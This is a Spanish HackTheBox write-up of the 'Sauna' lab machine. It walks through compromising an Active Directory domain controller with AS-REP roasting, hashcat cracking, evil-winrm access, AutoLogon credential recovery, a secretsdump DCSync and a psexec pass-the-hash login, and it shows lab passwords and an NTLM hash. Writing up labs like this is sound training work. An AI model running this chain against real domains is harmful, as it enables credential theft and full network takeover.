write-ups / hackthebox / sauna-htb
HackTheBoxeasyWindows
Sauna — AS-REP Roasting y AutoLogon en Active Directory
Ataque a Active Directory en Sauna de HTB. Enumeración web para usuarios, AS-REP Roasting, credenciales AutoLogon y DCSync con secretsdump.
14 de junio de 20241 min read
HTBActive DirectoryAS-REP RoastingWinPEASDCSync
Reconocimiento
bash
nmap -sV -sC -oN sauna.nmap 10.10.10.175
Domain Controller . Puertos: 80 (HTTP), 88 (Kerberos), 389 (LDAP), 445 (SMB), 5985 (WinRM).
bash
EGOTISTICAL-BANK.LOCALEnumeración de usuarios
La página web del banco muestra el equipo. Construimos posibles usernames:
bash
fsmith
scoins
hbear
btaylor
sdriver
skerb
AS-REP Roasting
bash
GetNPUsers.py EGOTISTICAL-BANK.LOCAL/ -usersfile users.txt -dc-ip 10.10.10.175 -no-pass
El usuario no requiere pre-autenticación Kerberos.
bash
fsmithbash
hashcat -m 18200 fsmith.hash /usr/share/wordlists/rockyou.txt
Password:
bash
Thestrokes2022Acceso inicial
bash
evil-winrm -i 10.10.10.175 -u fsmith -p Thestrokes2022
Escalación de privilegios
WinPEAS revela credenciales de AutoLogon en el registro:
bash
DefaultUserName: svc_loanmanager
DefaultPassword: Moneymakestheworldgoround!
DCSync
El usuario tiene privilegios de replicación en Active Directory:
bash
svc_loanmanagerbash
secretsdump.py EGOTISTICAL-BANK.LOCAL/svc_loanmanager:'Moneymakestheworldgoround!'@10.10.10.175
Administrator
bash
psexec.py EGOTISTICAL-BANK.LOCAL/Administrator@10.10.10.175 -hashes aad3b435b51404eeaad3b435b51404ee:823452073d75b9d1cf70ebdf86c7f98e